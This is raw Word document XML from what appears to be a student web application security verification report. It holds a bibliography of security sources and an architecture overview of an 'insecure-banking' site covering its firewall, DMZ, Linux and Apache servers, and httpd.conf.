              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004573F1">
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Antonín Steinhauser, P. T. (2020). Database Traffic Interception for Graybox Detection of Stored and Context-sensitive XSS. </w:t>
              </w:r>
              <w:r w:rsidR="004573F1">
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>ACM Journals, 1</w:t>
              </w:r>
              <w:r w:rsidR="004573F1">
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>(3). doi:https://doi-org.ezproxy.liberty.edu/10.1145/3399668</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="3088CA88" w14:textId="77777777" w:rsidR="004573F1" w:rsidRDefault="004573F1" w:rsidP="004573F1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">D. S. Kim, M. K.-H. (2020). Design and Performance Analysis of Software Defined Networking Based Web Services Adopting Moving Target Defense. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>IEEE</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>, 43-44. doi:10.1109/DSN-S50200.2020.00024</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="0ACE978E" w14:textId="77777777" w:rsidR="004573F1" w:rsidRDefault="004573F1" w:rsidP="004573F1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Miles Tracy (Federal Reserve Information Technology), W. J. (2007, September). Guidelines on Securing Public Web Servers. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>NIST</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>, 800-44.</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="3298D563" w14:textId="77777777" w:rsidR="004573F1" w:rsidRDefault="004573F1" w:rsidP="004573F1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>OWASP Application Security Verification Standard</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. (n.d.). Retrieved from OWASP: https://owasp.org/www-project-application-security-verification-standard/</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="2C3F16A6" w14:textId="77777777" w:rsidR="004573F1" w:rsidRDefault="004573F1" w:rsidP="004573F1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Sunaringtyas, V. N. (2020). Secure Code Recommendation Based on Code Review Result Using OWASP Code Review Guide. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>IEEE</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>, 153-158. doi:10.1109/IWBIS50925.2020.9255559.</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="0B54B66D" w14:textId="6EE44620" w:rsidR="004573F1" w:rsidRDefault="004573F1" w:rsidP="004573F1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Wukkadada, N. A. (2020). Identifying The Usage Of Known Vulnerabilities Components Based On OWASP A9. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>IEEE</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>, 88-91.</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="66DF5512" w14:textId="77777777" w:rsidR="004573F1" w:rsidRPr="004D627B" w:rsidRDefault="004573F1" w:rsidP="004573F1">
              <w:pPr>
                <w:ind w:left="845"/>
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
              </w:pPr>
              <w:r w:rsidRPr="00B73881">
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>New Living Translation.</w:t>
              </w:r>
              <w:r w:rsidRPr="00B73881">
                <w:rPr>
                  <w:noProof/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t xml:space="preserve"> (2011).</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="4663346F" w14:textId="77777777" w:rsidR="004573F1" w:rsidRPr="004573F1" w:rsidRDefault="004573F1" w:rsidP="004573F1"/>
            <w:p w14:paraId="3960FF9E" w14:textId="196FFD11" w:rsidR="00D7688E" w:rsidRPr="00B73881" w:rsidRDefault="00D7688E" w:rsidP="004573F1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                  <w:szCs w:val="24"/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
              <w:r w:rsidRPr="00D7688E">
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t xml:space="preserve"> </w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="7EBD2925" w14:textId="593B18DA" w:rsidR="00D7688E" w:rsidRDefault="00D7688E" w:rsidP="00D7688E"/>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2B72BB97" w14:textId="77777777" w:rsidR="002E4258" w:rsidRDefault="0060698B" w:rsidP="002E4258">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc46402703"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Web Application </w:t>
      </w:r>
      <w:r w:rsidR="002E4258">
        <w:t>Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="6B934A39" w14:textId="77777777" w:rsidR="00662AB6" w:rsidRDefault="00662AB6" w:rsidP="00AE4491"/>
    <w:p w14:paraId="0C9359A8" w14:textId="77777777" w:rsidR="00662AB6" w:rsidRDefault="00662AB6" w:rsidP="00AE4491"/>
    <w:p w14:paraId="0BE339B5" w14:textId="77777777" w:rsidR="002E4258" w:rsidRDefault="0060698B" w:rsidP="002E4258">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc46402704"/>
      <w:r>
        <w:t>Application</w:t>
      </w:r>
      <w:r w:rsidR="002E4258">
        <w:t xml:space="preserve"> Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="272986A8" w14:textId="77777777" w:rsidR="0060698B" w:rsidRPr="00770BF8" w:rsidRDefault="0060698B" w:rsidP="003221FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F1FB3D1" w14:textId="1186FE6D" w:rsidR="003221FD" w:rsidRDefault="003221FD" w:rsidP="003221FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770BF8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The Target of Verification (TOV) is the </w:t>
      </w:r>
      <w:r w:rsidR="00E43668" w:rsidRPr="00E43668">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>www.insecure-banking.com</w:t>
      </w:r>
      <w:r w:rsidR="00415780" w:rsidRPr="00E43668">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00415780">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>web site.</w:t>
      </w:r>
      <w:r w:rsidRPr="00770BF8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> It</w:t>
      </w:r>
      <w:r w:rsidR="002659CF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidRPr="00770BF8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">components are deployed as depicted in </w:t>
      </w:r>
      <w:r w:rsidR="00DF5816">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00770BF8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E42627E" w14:textId="77777777" w:rsidR="008C1CAF" w:rsidRPr="00770BF8" w:rsidRDefault="008C1CAF" w:rsidP="003221FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C9687E" w14:textId="77777777" w:rsidR="003221FD" w:rsidRDefault="003221FD" w:rsidP="003221FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70BA9930" w14:textId="591F4196" w:rsidR="000C1C85" w:rsidRPr="00DF5816" w:rsidRDefault="00EA3603" w:rsidP="003221FD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29C8C0EC" wp14:editId="0B911D57">
            <wp:extent cx="5479415" cy="53701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9415" cy="5370195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4193CA76" w14:textId="77777777" w:rsidR="00454611" w:rsidRPr="00770BF8" w:rsidRDefault="00454611" w:rsidP="003221FD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DCAECCD" w14:textId="77777777" w:rsidR="00454611" w:rsidRDefault="00454611" w:rsidP="003221FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CEB6FCE" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00770BF8" w:rsidRDefault="006860F0" w:rsidP="003221FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F2D0AEC" w14:textId="77777777" w:rsidR="003221FD" w:rsidRDefault="003221FD" w:rsidP="003221FD"/>
    <w:p w14:paraId="7E08FECF" w14:textId="77777777" w:rsidR="002E4258" w:rsidRDefault="0060698B" w:rsidP="002E4258">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc46402705"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Application </w:t>
      </w:r>
      <w:r w:rsidR="002E4258">
        <w:t>Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="3A244DCD" w14:textId="77777777" w:rsidR="00770BF8" w:rsidRDefault="00CA5C82" w:rsidP="005B4BFF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC97C07" w14:textId="77777777" w:rsidR="00CA5C82" w:rsidRDefault="00CA5C82" w:rsidP="005B4BFF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55A7E81E" w14:textId="77777777" w:rsidR="005B4BFF" w:rsidRPr="00770BF8" w:rsidRDefault="00CA5C82" w:rsidP="005B4BFF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The web sites</w:t>
      </w:r>
      <w:r w:rsidR="005B4BFF" w:rsidRPr="00770BF8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be described in terms of the following components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25809CFE" w14:textId="77777777" w:rsidR="005B4BFF" w:rsidRPr="00770BF8" w:rsidRDefault="005B4BFF" w:rsidP="005B4BFF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52138ACC" w14:textId="77777777" w:rsidR="00110D9C" w:rsidRDefault="004E6C1A" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network firewall component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C09BBC" w14:textId="77777777" w:rsidR="00110D9C" w:rsidRDefault="00110D9C" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web serve</w:t>
      </w:r>
      <w:r w:rsidR="004E6C1A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r software component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42235D27" w14:textId="77777777" w:rsidR="00AE4491" w:rsidRPr="00770BF8" w:rsidRDefault="00110D9C" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="004E6C1A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pplication server component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B9838C" w14:textId="77777777" w:rsidR="00AE4491" w:rsidRPr="00770BF8" w:rsidRDefault="00110D9C" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Relational database</w:t>
      </w:r>
      <w:r w:rsidR="00AE4491" w:rsidRPr="00770BF8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F87EA8" w14:textId="77777777" w:rsidR="00AE4491" w:rsidRPr="00770BF8" w:rsidRDefault="00110D9C" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>File system</w:t>
      </w:r>
      <w:r w:rsidR="00AE4491" w:rsidRPr="00770BF8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> component</w:t>
      </w:r>
      <w:r w:rsidR="004E6C1A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1FC2FA" w14:textId="77777777" w:rsidR="00AE4491" w:rsidRPr="00770BF8" w:rsidRDefault="00415780" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remote devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1987E9C2" w14:textId="77777777" w:rsidR="005B4BFF" w:rsidRPr="00770BF8" w:rsidRDefault="005B4BFF" w:rsidP="005B4BFF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E1F718D" w14:textId="77777777" w:rsidR="00454611" w:rsidRPr="00770BF8" w:rsidRDefault="005B4BFF" w:rsidP="005B4BFF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770BF8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Component details are below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6753D8EE" w14:textId="77777777" w:rsidR="00AE4491" w:rsidRDefault="006C4885" w:rsidP="00AE4491">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc46402706"/>
      <w:r>
        <w:t>Network F</w:t>
      </w:r>
      <w:r w:rsidR="00110D9C">
        <w:t xml:space="preserve">irewall </w:t>
      </w:r>
      <w:r w:rsidR="00AE4491">
        <w:t>Application Component</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="16B610D5" w14:textId="77777777" w:rsidR="00110D9C" w:rsidRDefault="00110D9C" w:rsidP="00AE4491"/>
    <w:p w14:paraId="61B08435" w14:textId="0710B215" w:rsidR="00AE4491" w:rsidRPr="00E93B6C" w:rsidRDefault="00E93B6C" w:rsidP="00AE4491">
      <w:r w:rsidRPr="00E93B6C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cisco ASA-5000 integrates firewall protection on the network. Positioned outside of the DMZ zone and then inside the DMZ provides maximum protection to the webserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCCD45F" w14:textId="77777777" w:rsidR="00AE4491" w:rsidRDefault="00AE4491" w:rsidP="00AE4491">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="6" w:name="_Toc46402707"/>
      <w:r w:rsidR="006C4885">
        <w:t>Web S</w:t>
      </w:r>
      <w:r w:rsidR="00431601">
        <w:t xml:space="preserve">erver </w:t>
      </w:r>
      <w:r>
        <w:t>Component</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="0BFC28AA" w14:textId="77777777" w:rsidR="00431601" w:rsidRDefault="00431601" w:rsidP="00AE4491"/>
    <w:p w14:paraId="63B0C7AA" w14:textId="524BEBBC" w:rsidR="00AE4491" w:rsidRPr="000B007A" w:rsidRDefault="000B007A" w:rsidP="00AE4491">
      <w:r w:rsidRPr="000B007A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Webservers installed in the DMZ zone </w:t>
      </w:r>
      <w:r w:rsidR="00645AC8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidRPr="000B007A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in between a firewall and IDS.  The servers are running on Linux platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE8B0A8" w14:textId="77777777" w:rsidR="00AE4491" w:rsidRDefault="006C4885" w:rsidP="00AE4491">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc46402708"/>
      <w:r>
        <w:t>Application Server</w:t>
      </w:r>
      <w:r w:rsidR="00AE4491">
        <w:t xml:space="preserve"> Application Component</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="6CCDE615" w14:textId="77777777" w:rsidR="006C4885" w:rsidRDefault="006C4885" w:rsidP="00AE4491"/>
    <w:p w14:paraId="11DD6006" w14:textId="7749F2BC" w:rsidR="00645AC8" w:rsidRPr="0030342C" w:rsidRDefault="00645AC8" w:rsidP="00AE4491">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache server software is installed on the </w:t>
      </w:r>
      <w:r w:rsidR="009C022B" w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the server. Web applications run on </w:t>
      </w:r>
      <w:r w:rsidR="0030342C" w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> software.</w:t>
      </w:r>
      <w:r w:rsidR="009C022B" w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apache is an open-source software that can run on any Unix or Linux platform. According to </w:t>
      </w:r>
      <w:r w:rsidR="0030342C" w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>most webservers</w:t>
      </w:r>
      <w:r w:rsidR="009C022B" w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> are using it as choice because</w:t>
      </w:r>
      <w:r w:rsidR="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="009C022B" w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache makes up 45.4% of the </w:t>
      </w:r>
      <w:r w:rsidR="0030342C" w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>marketplace” (</w:t>
      </w:r>
      <w:r w:rsidR="009C022B" w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>p.140, Web-Based Hacking: Servers and Applications</w:t>
      </w:r>
      <w:r w:rsidR="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0030342C" w:rsidRPr="0030342C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Evatt</w:t>
      </w:r>
      <w:r w:rsidR="009C022B" w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9F3941" w14:textId="680B40ED" w:rsidR="009C022B" w:rsidRPr="0030342C" w:rsidRDefault="009C022B" w:rsidP="00AE4491">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This software responds to requests and provides service or files as responses.  Common files to be on the </w:t>
      </w:r>
      <w:r w:rsidR="0030342C" w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lookout</w:t>
      </w:r>
      <w:r w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for is the main configuration file. The config file </w:t>
      </w:r>
      <w:r w:rsidR="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is commonly named</w:t>
      </w:r>
      <w:r w:rsidRPr="0030342C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> httpd.conf and contains access control on who can view the server status page.</w:t>
      </w:r>
    </w:p>
